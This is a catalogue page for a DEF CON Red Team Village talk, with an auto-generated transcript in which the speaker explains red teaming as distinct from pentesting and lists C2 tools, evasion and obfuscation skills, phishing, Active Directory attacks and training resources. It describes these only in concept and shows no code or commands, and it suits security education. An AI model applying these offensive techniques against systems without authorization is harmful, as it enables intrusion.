Red Team Village - Inside the Mind of a Threat Actor - TIB AV-Portal

Red Team Village - Inside the Mind of a Threat Actor

00:00

5

Formal Metadata

Title

Red Team Village - Inside the Mind of a Threat Actor

Subtitle

Beyond Pentesting

Title of Series

DEF CON Safe Mode

Number of Parts

374

Author

License

CC Attribution 3.0 Unported:
You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.

Identifiers

10.5446/49183 (DOI)

Publisher

Release Date

Language

Content Metadata

Subject Area

Computer Science

Genre

Conference/Talk

Abstract

Red team is a commonly misunderstood offensive security discipline. Red team has been used as a general term for all areas of offensive security just as blue team for defensive security. True red teaming goes Beyond Pentesting and into more adversarial emulation. While there are overlapping skills, there are differences that will be discussed as Phillip shares his experience of going from a pentester to a red teamer. In this talk, you will learn about the different areas that make up red team operations, common tools, and the path to becoming a red teamer. In this presentation, you will learn about resources helpful for a path into red teaming.

Speech

Text

Image

00:00

Asynchronous Transfer ModeMereologyInteractive televisionSoftware testingComputer animation

00:35

Asynchronous Transfer ModeHacker (term)Information securitySoftware testingStorage area networkProduct (business)Hacker (term)Focus (optics)Goodness of fitSpectrum (functional analysis)CybersexInformation securityProjective planeDifferent (Kate Ryan album)AreaInformation technology consultingComputer animation

02:27

Information securityDomain nameAsynchronous Transfer ModeAreaInformationInformation securityBlogDomain nameSoftware testingComputer animation

03:15

System administratorComputer-aided designAsynchronous Transfer ModeInformation securityInformation securityPower (physics)AreaPort scannerVulnerability (computing)Information technology consultingWeb applicationPhysical systemNetzwerkverwaltungFamilySoftwareSystem administratorSoftware testingWage labourOffice suiteSocial classDifferent (Kate Ryan album)Computer-aided designProcess (computing)PlanningDirectory serviceNeuroinformatikMultiplication signSlide ruleComputer animation

05:18

Hacker (term)Asynchronous Transfer ModeSlide ruleAreaShared memoryPower (physics)Row (database)Dependent and independent variablesInformation securityHacker (term)Goodness of fitComputer animation

05:56

High-level programming languageInformation securityHacker (term)Asynchronous Transfer ModeDomain nameComputer networkPoint cloudSocial engineering (security)Computer hardwareType theoryHacker (term)Information securityDifferent (Kate Ryan album)Procedural programmingDomain nameCategory of beingPhysicalismSocial engineering (security)Cartesian coordinate systemPoint cloudAreaComputer simulationCovering spaceWireless LANComputer hardwareSoftwareSoftware testingComputer animation

06:45

Term (mathematics)Asynchronous Transfer ModeComa BerenicesPhishingSocial engineering (security)Information securityDifferent (Kate Ryan album)Software testingExploit (computer security)Rule of inferenceAreaSocial engineering (security)PhishingForm (programming)Sinc functionMereologyMultiplication signSimilarity (geometry)PhysicalismStatement (computer science)Information securityComputer animation

07:49

EmulatorAsynchronous Transfer ModeFocus (optics)Multiplication signVulnerability (computing)Information securityAreaMereologyComputer crimeProcess capability indexSoftware testingConstraint (mathematics)Service (economics)CuboidPort scannerCASE <Informatik>Personal identification numberFocus (optics)Different (Kate Ryan album)Social engineering (security)Statement (computer science)Computer animation

09:30

Computing platformMalwareExploit (computer security)Control flowAsynchronous Transfer ModeHigh-level programming languageElectronic mailing listMalwareGame controllerVulnerability (computing)Exploit (computer security)Port scannerNoise (electronics)Software testingComputer animation

10:16

Information securityAssociative propertyLatent heatMilitary operationOperator (mathematics)Software testingAsynchronous Transfer ModePhysical systemComputer simulationInformation securityOperator (mathematics)Software testingGame controllerSoftware frameworkHacker (term)Real numberAssociative propertyProcess (computing)Source codeComputer animation

11:18

Operations researchInformationSocial engineering (security)Integrated development environmentAsynchronous Transfer ModeEnumerated typeSoftware testingMultiplication signProcess (computing)MereologyIntegrated development environmentPhysical systemData managementComputer wormOperator (mathematics)Social engineering (security)Type theoryWebsiteTraffic reportingInformationCASE <Informatik>PlanningMalwareSource codeComputer animation

13:12

Operations researchControl flowMalwareSystem programmingAsynchronous Transfer ModeMalwareComputer wormIntegrated development environmentExploit (computer security)Game controllerMultiplication signLine (geometry)1 (number)CodeWindowMultilaterationMatrix (mathematics)Physical systemOperator (mathematics)Software testingMusical ensemblePlanningComputer animation

14:41

Asynchronous Transfer ModeRippingPlanningLatent heatSoftware frameworkInformation securityVector spaceOpen setStorage area networkComputer configurationSoftware frameworkVulnerability (computing)Physical systemComputer programmingSoftware testingOperator (mathematics)Solid geometryData managementPlanningVideoconferencingLevel (video gaming)AdditionComputer animation

16:32

Process (computing)Software testingMilitary operationInformation securitySystem programmingAsynchronous Transfer ModePhysical systemAdditionInformation securityVulnerability (computing)Exploit (computer security)Operator (mathematics)Type theoryElectronic signatureDifferent (Kate Ryan album)Gastropod shellProcess (computing)Software testingPower (physics)Computer animation

17:27

Computer programmingScripting languageBuildingComputer networkOperations researchSystem programmingActive DirectoryAsynchronous Transfer ModeSoftware testingService (economics)System administratorDirectory serviceLevel (video gaming)CodeOperator (mathematics)Exploit (computer security)Hacker (term)Set (mathematics)Object (grammar)Cross-platformPerspective (visual)Physical systemPrime idealWindowAreaComputer programmingMereologySoftwareScaling (geometry)Scripting languageSimulationInformation securityFirewall (computing)Different (Kate Ryan album)Single-precision floating-point formatExtension (kinesiology)WritingIntegrated development environmentMusical ensembleProcess (computing)Goodness of fitSinc functionQuicksort1 (number)Similarity (geometry)Game controllerFormal languageInstance (computer science)Personal identification numberForm (programming)NeuroinformatikSingle sign-onType theoryComputer animation

22:12

Control flowPhishingSocial engineering (security)Information securityExploit (computer security)MalwareActive DirectoryAsynchronous Transfer ModeDirectory serviceNeuroinformatikPhysical systemGame controllerSoftwareFormal languagePhysicalismBuildingSocial engineering (security)CodeAreaInformation securitySoftware testingSoftware developerExploit (computer security)EmailDifferent (Kate Ryan album)Electronic signatureComputer wormHash functionPasswordServer (computing)CASE <Informatik>MalwareComputer animation

24:09

Hacker (term)Social engineering (security)Extreme programmingInformation securityPenetrationstestPoint (geometry)Asynchronous Transfer ModeSoftware testingContent (media)Software developerPhysical systemHacker (term)CuboidSet (mathematics)Exploit (computer security)WindowPublic key certificatePersonal identification numberLevel (video gaming)Extreme programmingEmailInformation securityGoodness of fitFocus (optics)Integrated development environmentDirection (geometry)Point (geometry)Directory serviceCodeSocial engineering (security)Moment (mathematics)Operator (mathematics)E-learningComputer animation

26:54

PlanningControl flowOperations researchSystem programmingAsynchronous Transfer ModeSoftware frameworkPlanningOpen sourceProjective planeInformation securityOperating systemOperator (mathematics)Computer configurationWindowWeb 2.0Goodness of fitDirectory serviceThread (computing)Different (Kate Ryan album)CuboidGame controllerPhysical systemSoftware testingStorage area networkDebuggerHacker (term)Vector spaceCollaborationismMatrix (mathematics)Freeware1 (number)Uniform resource locatorComputer animation

29:12

Hacker (term)Information securityPoint (geometry)PenetrationstestExtreme programmingOperations researchControl flowMalwareEmulatorVideoconferencingContent (media)SimulationAsynchronous Transfer ModeMaterialization (paranormal)Software developerPoint (geometry)MalwareE-learningMobile WebGoodness of fitPresentation of a groupSocial classOperator (mathematics)Expert systemIntegrated development environmentStorage area networkComputer filePhysical systemVideoconferencingSeries (mathematics)Electronic mailing listInformation securityPublic key certificateWindowCuboidFirewall (computing)EmailQuicksortDifferent (Kate Ryan album)Process (computing)Scripting languageFormal languageControl flowBlogWeb applicationEmulatorMathematical analysisType theoryMoment (mathematics)Perspective (visual)Wave packetLink (knot theory)YouTubeWeb pageSoftware testingSimulationWebsiteProjective planeGastropod shellDrop (liquid)Quantum statePersonal identification numberWater vaporPower (physics)Web 2.0Extreme programmingVirtuelles privates NetzwerkComputer animation

33:11

BlogInformation securityAsynchronous Transfer ModeElectronic program guideBlogInformation security40 (number)Goodness of fitSoftware testingWebsiteInformationElectronic mailing listMereologyDrop (liquid)Computer animation

34:42

PenetrationstestHacker (term)Electronic program guideOperations researchAsynchronous Transfer ModeChecklistSoftware testingReal numberOperator (mathematics)Data managementHacker (term)AuthorizationPrice indexDrop (liquid)Revision controlInformationElectronic program guideSoftware developerPersonal identification numberWave packetGoodness of fitDifferent (Kate Ryan album)Public key certificateComputer animation

36:08

Operator (mathematics)Information securityExpert systemSoftware testingExtreme programmingAsynchronous Transfer ModeInformation securityPhysicalismSoftware testingPublic key certificateCASE <Informatik>Storage area network1 (number)E-learningPoint (geometry)Operator (mathematics)Goodness of fitProcess (computing)InformationTheory of relativityComputer animation

37:25

Asynchronous Transfer ModeHacker (term)Social classInformationPresentation of a groupMultiplication signOnline helpComputer animation

38:02

Asynchronous Transfer ModeHacker (term)Social classTouchscreenDescriptive statisticsYouTubeData conversionLink (knot theory)Greatest elementLattice (order)Computer animation

Transcript: English(auto-generated)

00:00

work with you. Good to support the village. I'm really, really glad to see that DEF CON continued on this year. I think it was a great idea. You know, there's a lot of people that don't always get to make it out to DEF CON, and so, you know, people get a little taste of what it's like. They miss the human interaction part, but I would bet it's going to be back even bigger and stronger next year. But thanks to Omar and Joseph for

00:22

continuing this on as well as DEF CON in general. So, I'm happy to present my new talk here today. I have a talk that I do, the pen tester blueprint, and it's basically a talk on becoming a pen tester. And so, I came up with something more Red Team related,

00:42

because there's a lot of confusion between what true Red Team is and pen testing. So, who am I? I'm Philip Wiley. I have my CISSP, OSCP in the sands, GWAPT cert. I'm a professor at Dallas College, formerly Richland College. I'm the founder of the Pone School

01:04

Project, which is a monthly now virtual meetup that teaches cyber security techniques, as well as a big focus on stuff offensive security. So, a lot of our talks are geared towards that. Even some good talks on SOX and other areas of security. I've been in technology

01:24

and infosec for over 22 years. 2004 is when I got my start into security. The last eight years I've spent pen testing, first five years I was a consultant. I was featured in the book, the Tribe of Hackers Red Team book edition. So, those are some really

01:41

great books by Marcus Carey and Jennifer Jind. Really good for those getting started out, but I recommend it for anyone else. It's advice from industry professionals on different topics. There's the red team. There's the first tribe of hackers. It's across all spectrums of security. And then there's the leadership book out. I'm also the co-author of the Pen Tester Blueprint,

02:04

Starting a Career in Ethical Hacking. I took my talk, the Pen Tester Blueprint, and decided to make a book. And I teamed up with Kim Crawley to help me make that a reality. So, that should be coming out late fall or so. And I'm also a co-host of the Uncommon Journey

02:22

podcast with Chloe Mistagi and Alyssa Miller. So, the agenda, during this talk, I'm going to describe my path into offensive security. Because a lot of people that attend these talks are trying to get into it. There's not a lot of, you know, you have to look out there to find

02:42

good information on how to get into certain areas of security. And there's not a lot of stuff on offensive security. So, continuing on in the spirit of the blueprint, Pen Tester Blueprint talk, I've kind of extended that on to offensive security in general. With this talk being more focused on red teaming, we're going to discuss what offensive security is, the different domains,

03:05

a red team intro, red team tools, a red team blueprint, as well as some other educational resources and books out there and blogs. So, my offensive security path is kind of an unusual one. I started out as a pro wrestler. I graduated high school and my friends asked me,

03:24

what are you going to do for a career? And I did not have a clue. I mean, really college wasn't in the plans for me and I didn't know what I was going to do. I was a powerlifter and my friends said, hey, you're a big guy. You should be a pro wrestler. So, I went to wrestling school and I wrestled for a few years and I got out in the late 80s due to needing a more

03:45

stable career since I got married. So, I was married and needed a stable career for my wife and future family. When I did that, you know, just having, you know, working through other areas of manual labor and retail sales, I saw a ad on TV for a trade school that taught AutoCAD.

04:07

So, I went to school to be a CAD draftsman and there's where things really started to take off. I learned about sysadmin work because I was working in offices and we had a network administrator or system administrator come in one time to work on our systems and found out that,

04:24

you know, this guy was making more money than I was and what he did looked a lot more interesting. I taught myself how to build computers, took a Nobel network class that used to be the popular network operating system before Microsoft really took off. With their directory services. So, from there I moved into InfoSec and then AppSec and AppSec is

04:45

really where I kind of found out about pen testing and offensive security. Learning how to use web application vulnerability scanners, go into some different vendor talks on their tools and stuff got me interested in pen testing. So, in 2012, I got laid off from my my job of 14

05:02

years at a mortgage company and then I went to work as a consultant working in pen testing. I did that for five years and then got out of consulting and moved more into the corporate world and then back in November I moved into red teaming. So, this is a slide I share every

05:21

semester and during all these conference talks because, you know, only hack if you have permission, even better written permission, hacking without permission is illegal. So, as long as you have permission, you're good. But, you know, you don't want to get in any trouble because if you get any kind of criminal record then it kind of makes it hard to work in any area of IT and

05:46

especially something like offensive security. So, I like this quote. I first learned about it from Spiderman. With great power comes great responsibility. So, what is offensive security? So, offensive security is this kind of a broad generalization of different types of ethical

06:05

hacking. So, it's assessing security of a target using adversary tactics techniques and procedures or TTPs commonly known as ethical hacking. So, some of the different secure domains in offensive security two main categories is pen testing and red teaming. You can see different areas

06:24

in pen testing that are covered. Network application, network including wireless cloud, social engineering, physical security, hardware, and vehicle security can be tested through pen testing. Red teaming is kind of more of a specialized area. You're getting into more

06:41

adversarial type simulations, but there's been a lot of confusion. So, red teaming, red team engagement is not a pen test. It's not the same thing. They've been used interchangeably pen testing and red team for years. It's a way to generalize kind of the same way the blue team generalizes the defensive side. Even on the defensive side,

07:03

all blue team's not the same. There's a lot of differences, but red team, a lot of people have confused and think that red teaming in general, that it's all the same, but it's not. So, there are some distinct differences. Some of the commonalities that are these similarities between the two areas. They're both forms of pen testing or forms of offensive

07:24

security. Exploitation, social engineering, phishing, and physical security exploitation are used on both of these. Sometimes not everything. With your pen testing, a lot of times only social engineering, phishing, or physical security exploitation is not part of it.

07:44

It's specifically built into the statement of work, the rules of engagement. And there's some differences there too. So, with red teaming, you're emulating a threat actor, an APT, an advanced persistent threat. With pen testing, you're using some of those techniques,

08:04

but you're not emulating a threat actor. You're just using some of those techniques. In red teaming, you're trying to avoid detection. With pen testing, it's a time box test. You're limited to the amount of time you have to test. So, you don't have time to go low and slow to try to avoid being detected.

08:21

And due to the time constraints, you're using vulnerability scanners and doing a lot of port and service scanning, which makes it more loud. So, you're not really avoiding detection. Sometimes it could be part of a statement of work, but usually this gets more into your red teaming. Red teaming is less restrictive. There's more areas you can, most cases, social engineering, phishing are part of it,

08:45

part of the scope. With the pen testing, it's more limited. With PCI, when PCI came out, a lot of the pen tests, and PCI has drove a lot of pen testing requirements. To be PCI compliant, it's a requirement to be pen tested. So, a lot of the focus has been

09:03

on just what is needed to be compliant and not overall security. So, some things get missed. And that's kind of carried on throughout pen testing. There's a certain area that they want to be tested. Sometimes it's not a lot of time to plan it out. Budget constraints, they just want to get it done quickly. And with pen testing, vulnerability is the focus.

09:24

Whereas with red teaming, you're trying to simulate an actual attacker or cyber criminal. And there's a lot of tool commonalities. If you look at the list of tools here, you see everything is pretty much the same. There are some variants and some things that are not on this list, but the common tools are listed here. With pen testing, you're using

09:44

vulnerability scanners. Red teaming, if you're using a vulnerability scanner, you're going to cause noise. You want to be quiet. Metasploit can be used across both of those. And also, you see malware and exploits used across both. But red teaming, it's more heavily dependent on

10:04

to get the footholds using malware, do phishing campaigns. Command and control are listed on both, and useful on both, but a lot more heavily relied on for red teaming. And so here's kind of a little introduction on red teaming. Red teaming is scenario-based

10:25

assessment, emulating threat actors, and even simulating specific APTs. You can go through like the MITRE ATT&CK framework and pick out specific APTs to mimic. The goal of red team operation is to simulate real-world breaches. Not only is this operator testing the security

10:41

of technology, they're testing the people in the process. A great quote from Wirefall, the founder of Dallas Hackers Association, is the red team tests the blue team. And this is a good way to describe that. When you're doing a pen test, you're really not testing the people. You're testing the security controls and the technology. With red teaming, you're testing

11:03

the reactions of the defenders, as well as any of the systems being detected. During a pen test, things can be detected. And usually, unless it's built in to block it, you're not going to get blocked. They're going to let you complete the pen test. And red team operations take

11:21

a lot of time to plan and perform. So you're trying to go and plan a specific scenario, a certain type APT you're trying to imitate. So you're taking the time to plan this out to perform it. And usually, you got more time. You know, a pen test, you know, I'm not saying it's a thorough pen test, but a lot of times pen tests may be a week.

11:42

You know, like a red team engagement could be, you know, four weeks or it could be months. So it depends on the scenario you're trying to imitate. And so red team operations rely heavily on OSINT to enumerate information on target technologies and employees. This is leveraged through social engineering and phishing to gain initial foothold in the target environment.

12:04

You can also do like a assumed breach and use accounts. But this is a good way to see how easy it is to get past, you know, people, you know, the process and technology by

12:20

using phishing campaigns, you know, sending malicious payloads to end users or compromising a site and putting payloads in there to gain access to the systems. Detection avoidance is very important for a red team to be successful because part of this is they're trying to stop you. Whereas a pen test, they may see something going on and they're

12:41

going to let you finish the pen test. During a red team engagement, usually the people you're testing, they don't know about the pen test. It's not announced. Usually management and a few key people know what's going on. So in case, you know, the defenders detect this, they can report it and it can be treated internally to look like a normal breach to see

13:02

how everyone reacts to it during the exercise. So that's important to stay undetected. And red team TTPs. Red team operations will allow malware payloads to gain initial footholds. So being able to evade and obfuscate your code for your malware and

13:24

exploits is very important. A lot of times to get it to work in a pen testing role, you have to work on obfuscating your code because PowerShell is getting more detected, although some environments it's not. So as a practitioner, you know, keep trying, you know,

13:41

people will say this is not environments anymore. It still will be. I mean, I performed pen tests as recent as the end of 2018 where Windows XP was in a company, a Fortune 100 company. So that stuff's still out there and not everyone's blocking PowerShell, but it's becoming more often blocked. So some of the skills that you'll need to work on is really working on

14:02

the evasion and obfuscation. Command and control or C2 is very important tool used to compromise systems, deliver payloads, elevate privileges, lateral movement, and use for persistence. Cobalt strike is a very popular command and control, as well as there's Silent Trinity, Covenant. And actually Team Ares from Critical Start came out with the Meteos,

14:28

which is a new C2 that's built on Go. So it looks really promising. A new one out there and recently was added to the C2 matrix. And Red Team Ops planning. So as we mentioned,

14:45

there's more planning that goes into this. It can be more detailed. So you can map the APTs from the MITRE ATT&CK framework and use tools like Vector. Vector is a pretty cool tool I learned about from George Ochea's talks. He does a lot of great talks on Red Teaming and Purple Teaming.

15:02

He currently works for Scythe. So he's a SANS instructor. He teaches the SANS Purple Team, I mean, the SANS Red Team course. So keep an eye out for his videos. This Vector tool is a framework that you can plan out your scenarios for your Red Team engagements. So

15:21

you can go through the map out the APTs that's pulling from the MITRE ATT&CK framework. And so Red Team Ops can also be less complicated and not map to specific APTs, just using common TTPs. And as your program starts out, it may not take really advanced attacks to be able to compromise systems. It's kind of like offensive security in general.

15:44

You want to make sure that you've got your vulnerability scanning program, your vulnerability management solid in place before you include it with pentesting. But you really want to get that in place and working on that. As you get to more open scope pentests and Red Team

16:01

engagements where more things are in scope and can be exploited, then as you become more mature, then you'll need to emulate more advanced attacks. So starting out, you may not have to be as complicated, but as you're going along, you can become more complicated and detailed in

16:22

your attacks. And using the tools like the MITRE ATT&CK framework and vector to map those out are great options. And so there are some additional Red Team benefits here. So a major benefit of Red Team is testing the people process and technology. So during the operation

16:41

of activities not detected, then the Red Team can work with the security team to tune the security defenses to be able to detect malicious activity. This can be extended to purple teaming engagements or activities where you just work with the blue team to tune their systems to detect different types of exploits. So during your testing, if PowerShell is not being

17:05

detected, if Mimikatz is not being detected, then you can kind of do a purple team activity, just kind of working with your blue team as you watch specific attacks, see if they detect it and help them to work on detecting those systems where you can build signatures to detect those

17:24

vulnerabilities. And so in the spirit of the Pentester Blueprint, I'm kind of going to go into some details on here on how to become a Red Team operator. So basically, a Red Team operator

17:42

is a Pentester. You're getting more specialized, going more into adversarial simulation, but you need a base starting out. So your base, you need to understand technology. So if you're jumping in this from nothing, then you're going to have to build these technologies.

18:03

You have to understand networking and operating systems and Active Directory that you're performing pentests against on these networks and Red Team engagements. Because Active Directory is Microsoft's directory services where all the users and different computer objects and security settings are set in Active Directory. You get access to that. You can breach a lot of

18:23

things, compromising a large scale. I mean, the way to look at it is kind of like a single sign-on type of solution using LDAP. So if you're able to compromise Active Directory, then you can get access to anything in the environment. So you have to understand this technology. So understanding networking, understanding operating systems from a system administrator

18:47

perspective. You need to be able to start and stop services, disable firewalls, enable services, and that sort of thing during a pentest. So if you gain a shelter system or command line access, then the more you understand the command line, the more things you

19:03

can do, the more effective you can be. And you've got to understand networking and pentesting hacking. So you have to understand the different tools and techniques that penetration testers and hackers use. So you have to have those because hacking is part of being

19:20

a red teamer. That's part of the job. It's kind of an extension or more advanced form of pentesting. And so programming and scripting can be very important. Some of the best hackers I know can program. They can write their own code or they can write their own scripts. So popular ones out there are Python and PowerShell from a red teamer

19:46

or a pentester perspective. Knowing how to use PowerShell using some of the tools like PowerShell and Pyre and some of the different exploitation tools out there and command and control is very important. So you don't necessarily have to know how to write

20:01

PowerShell, although it's good. Tools like Python and Golang can be used across multiple platforms. Python has been very popular for years. It allows you to write tools pretty quickly, modify tools. And from programming and scripting perspective, at first you need to really be able to modify exploit code, be able to look at Python code and be able to alter that. Maybe

20:26

you find some exploit code and there's something different about that system that you need to modify. So just understanding how to modify exploits is important. It's a good starting step. But be able to write Python scripts. Golang is a very new popular one. I guess it's been out

20:43

five or six years or so, maybe longer, eight years. But it's a really good one because it's also a compiled language. It can run across multiple platforms. The thing I really like about it too is you can compile code on a Linux or Mac system to run on Windows.

21:01

So this is kind of nice because some of your exploits, you know, if you're doing a pentest, then you need, you know, a similar system with Linux to be able to compile your exploit code, a similar system or compile it on that system. With this, you can easily compile it on your own system. And then C sharp is a very popular one for pentesting since kind of

21:26

some of the PowerShell started getting detected and people moved on to C sharp. There's a lot of tools out there written in C sharp. A lot of the tools are, you know, kind of going away from PowerShell more towards C sharp. So understanding these tools, you'll write your own tools and make you a lot better hacker. So yeah, just be able to do that makes, you know, like I said,

21:46

some of the best hackers I know in red teamers know how to write their own code. I mean, you stop and look at some of the tools out there. Harmjoy, for instance, from SpecterOps. He's a prime example of someone that writes tools and he's a red teamer. So I mean, this goes to show you, you look at a lot of these high level pentesters and red

22:04

teamers, they're writing exploits and they're writing tools. So if you really want to do well, then that's an area to focus on. So red team focused skills. So malware and exploit development, where these are also important to pentesting, really working on obfuscating and

22:24

be able to evade systems with, you know, your PowerShell code or C sharp or any language you're writing and be able to obfuscate. Sometimes there's written tools out there and you can use different tools to obfuscate are going to manually modify yourself to try to take some of the headers out and signatures. So it's not as easily detectable. Sometimes it

22:44

could just be the name of the developer of the tool that the system is picking up or the name of the tool in the system. So just be able to modify your code where it's not being detected. Active directory exploitation, you know, understanding active directory is not enough, but understanding active directory and knowing how to exploit it is very important in

23:04

red teaming and command and control. So command and control is a very important tool. It allows you to send payloads to your systems. You know, once you get a system compromised, you get access to it. Then you can do lateral movements, going to other computers, other accounts, try to escalate privileges and help you maintain persistence, maintain control

23:25

over the systems that you've exploited. In phishing and social engineering, these are two very helpful tools because a lot of cases, maybe their systems are pretty secure as far as trying to, you know, crack passwords or if you're on, you're doing a soon breach or you're

23:43

on that network and maybe you're not able to crack hashes. So if you can send malware through email, through phishing campaigns, then that's a way to get an initial foothold. Social engineering to get people to execute that code. Physical security exploits, gaining

24:01

access to the buildings, getting past security into the server rooms or different areas to be able to pull off your exploits. And kind of here is kind of a learning path to follow for gaining these skills, kind of a good baseline or good place to start. And this is assuming

24:23

that you've got an IT background is you've got to learn the hacking skills. So certification courses like the OSCP, Hack the Box are really good to build those skills, you know, learning social engineering. But the OSCP is a really good one because you've got to get those hacking

24:44

skills before you really get into the red teaming. So you need to be a good hacker. So there's other courses out there like eLearn Security where a lot of those other courses really focus on pen testing, which pen testing and hacking is similar with the OSCP. There is a

25:01

big focus on hacking skills. And with some of the newer content of OSCP, they've kind of added, went more in the direction of adding more pen testing content. Whereas before is mainly just a really great hacking course and kind of teaching kind of the way pen testing

25:23

used to be. But a good path is once you get the skill set of someone with OSCP, then you can start working on the red teaming skills. And this is something you can work on hand in hand because your red teaming skills, you're going to be working on active directory. So there's some courses out there that are really good for red teaming and pen tester

25:43

academies, red team labs is a good resource. They have active directory in their labs, so they've got different levels, but they even have like a red team certification. They have labs where you're using Linux to exploit Windows systems as well as Windows systems

26:02

to perform the same similar labs, learning how to use PowerShell exploits during that to compromise systems. And then eLearn Security, their pen testing extreme course is, you know, it's labeled pen testing extreme, but it's a red team course. It teaches red teaming techniques.

26:21

They teach you exploit development, code obfuscation, and some other techniques that are important for red teaming. Hack the Box Pro, Rasta Labs, this is a really great good one to learn. And it's kind of inspired Rasta Mouse to start the Zero Point Security

26:40

Red Team Ops course. I'm actually going through that. And if they actually have a certification with that, I'm currently going through that at the moment. And it's a really good course. I mean, it's even set up to where you can send phishing emails in that environment. And so some different tools and resources for red teaming. So your APT planning,

27:01

as mentioned, the MITRE ATT&CK Framework vector. So there's the URLs for those resources. Those are really good to know. Just getting out there and learning how the, you know, a threat actor's mind works, getting that threat actor mindset through tools like the MITRE ATT&CK Framework, learning how those TTPs work. You know, you get to see some

27:23

of the common attacks. And this is a great resource for defenders to be widely used by defenders. Command and Control, the C2 matrix. You can find that at thec2matrix.com. Cobalt Strike is one of the more popular ones, one of the first command and control. Although Metasploit is also considered command and control, it's also pretty heavy on the

27:45

exploit framework. But Cobalt Strike, Silent Trinity, PowerShell Empire, BC Security took over support of that and upgraded it to Python 3. And you can use Star Killer, which is a web front end to it that makes it more similar to some of the other C2s that have a web front end.

28:05

Or you can use these tools as a team. You can collaborate together. So you can, you know, collaborate on the same project. So these really work good for collaboration. And a shout out to Critical Start Team Aries with their Demios C2 that recently came out. It's written

28:22

in Golang. They're adding new items to each feature as it goes along. So it just recently come out. They're pretty excited about it. It looks like a really good tool. So you should check that out. And it's a free tool. It's open source like a lot of the other C2s.

28:41

And operating systems, Slingshot OS or Slingshot Linux, you can find that on SANS. It's a good operating system for pen testing as well as red teaming. It has a lot of the C2s already installed. So it actually vector, I believe vector is installed as well. Kali Linux and

29:03

Parrot OS are good hacking options and Commando VM for Windows. So in red teaming, you're dealing a lot with Active Directory. So it's good to have a Windows box to test with. And resources and courses. So Hack the Box Pro, as mentioned by Rasta Labs,

29:21

one of Rasta analysis projects, Pen Tester Academy, red team labs, and the Institute.Sector7.net. This is a good course. They have relatively inexpensive and I'm kind of listening to some of these out based on the expense of the course. They

29:40

have a course on malware writing for red teaming. They have a privilege escalation as well as another course. I can't think of at the moment that these three different courses build red team skills. And sometimes some courses may deal more on the red team side and less on the malware. With this course, they have a good coverage of malware. So that's a good skill to develop. And they cover that in that course. And Zero Point Security,

30:05

the red team labs course by Rasta Mouse, which they actually have a certification for it. This is a pretty cool environment. You have VPN access to it. They have Windows boxes in there. You're separated through a firewall so you're connecting in. So you have to send a phishing

30:25

email to get on that system. So it's really cool. If you have the OSCP, you can just take the exam. But I didn't really want to miss out on the educational opportunity of going through the course fully. So that's currently what I'm working on. It's been a lot of fun so

30:40

far. eLearn Security, as we mentioned, the pentesting extreme course. That one's a red team course and they cover malware. So it's a really good, well-rounded course. Covers a lot of good materials. I haven't personally taken this course myself, but I've taken the eLearn Security web app pentesting course and their mobile pentesting course. And they're good quality courses. And they don't expect you to be an expert to be able to take these

31:04

courses and learn from it. They start in enough detail that someone with technical experience can pick these up. And then the SpecterOps adversary tactics and red team operations. Fortunately, I got to take a couple of courses before COVID really started ramping up and causing us all to have to social isolate. But I got to

31:24

attend this talk and Harmjoy was one of the presenters there, as well as some of the other gurus from SpecterOps. But this course, if you've got Cobalt Strike, this is a really good way to learn Cobalt Strike and use it as a red team operator. 40 North has

31:41

a couple of good classes. Their initial access operations and intrusion operations. So they cover some malware in their course, as well as silent break security, which they have like malware development course and the adversary simulation. So these are really great courses

32:00

and the SANS red team exercise and adversary emulation. This is a two day course and George Rochius teaches this and it looks like a really good course. And then they get into, you know, the red team from, you know, building a team type perspective as well as doing the technology piece. And then Cobalt Strike offers some free videos on their site. If

32:25

you go to the training and support tab on the Cobalt Strike website, there's links to the YouTube page as well. So they've got all sorts of tools in Cobalt Strike that they teach you how to use. I mean, a lot of the tools are pretty easy to pick up on. But if you haven't

32:40

had experience with C2s, then I highly recommend these videos because there's things that are done a little bit different with a C2. But they do a good job of covering the different tools that you can use within Cobalt Strike. And Cobalt Strike uses PowerShell and C Sharp tools pretty heavily as well as other scriptings and scripting languages and

33:01

executable files. So that's a good resource out there. You get a good idea of how red teaming works from the Cobalt Strike video series as well. And resources and blogs. So here's a list of some blogs and resources that I've come across. I started dedicated red teaming back in November.

33:25

So I've been doing a lot of research and studying to learn the red team side of things. And so here's some good. The Red Team Journal is kind of an older blog. I don't think it's been updated lately, but there's a lot of good information on there.

33:40

The Red Team Guide is based on the Red Team Guide book, but there's a lot of good documents on starting pen tests and some of the different techniques, I mean, red teaming techniques. And then Thread Express is kind of a site related to the redteam.guide. The same people. It was kind of their blog before they came out with the Red Team Guide.

34:02

Good information there. Byte Leader's website along with his awesome tools. There's a lot of great information on his blog. Harmjoy's blog is great. VC Security, SpecterOps, Rasta Mouse, HouseSec is actually part of SpecterOps, Silent Security's blog,

34:22

40more's blog, and iRed.team and Vincent Yu's blogs. These are some really good places to learn. And I've been using a lot of resources as I'm going through the Rasta Mouse's Zero Security Red Team Ops course.

34:44

There's some other books out there. So this is one of the books out here that recently came out. The Hackers Playbook, if you've seen version one and two, it's more pen testing related, but version three gets into red teaming. I highly recommend if you don't have version two,

35:01

get version two. It's got a lot of good real world pen testing attack scenarios. So also the Red Team Development and Operations. This kind of shows you how to build a red team. And this is one of the authors is Joe Vest. He formerly worked with SpecterOps. I got to meet him back during the red team training through SpecterOps earlier this year.

35:25

So it's a really good book. And they got some different checklists and stuff on how to perform red team operations. So that's a really good book. Even for management or people manage red teams, I'd recommend this book as it kind of shows you how red team operations work.

35:42

And then Hands-On Red Team Tactics, A Practical Guide to Mastering Red Team. This book actually covers some cobalt strike information. And this was recently recommended yesterday during one of the, actually Friday, during one of the talks in Red Team Village. So it's a little more indicator that it's a good resource. But these are some good books

36:03

out there as well as just pen testing books in general, learning pen testing and certifications. There's not like a lot of certifications out there yet, and there may be more than this. And I saw another red team cert that is more physically and more lock picking and more

36:21

physical security related. But what you're going to need from, in most cases, what you would gain from Zero Point Security's cert, Pentester Academy Learning Security, the skills that you would need for performing red teaming operations. While some of the physical stuff is important, you can take lock picking courses and learn physical security

36:43

to kind of really get started, especially if you have a pen testing background. And these three cert courses or the certs would be good to have. And some of these pen test focused certs from Offensive Security, SANS, and eLearn Security. Offensive Security and the

37:01

SANS certs are really good for getting your foot in the door as a pen tester and good for getting pen testing jobs. The eLearn Security is starting to gain more and more notoriety. They're really good courses and really well written and really well priced. If you don't have the money to, you know, your company will put you through SANS training, then Offensive Security and eLearn Security, those certification courses are really good ones, as well as the

37:24

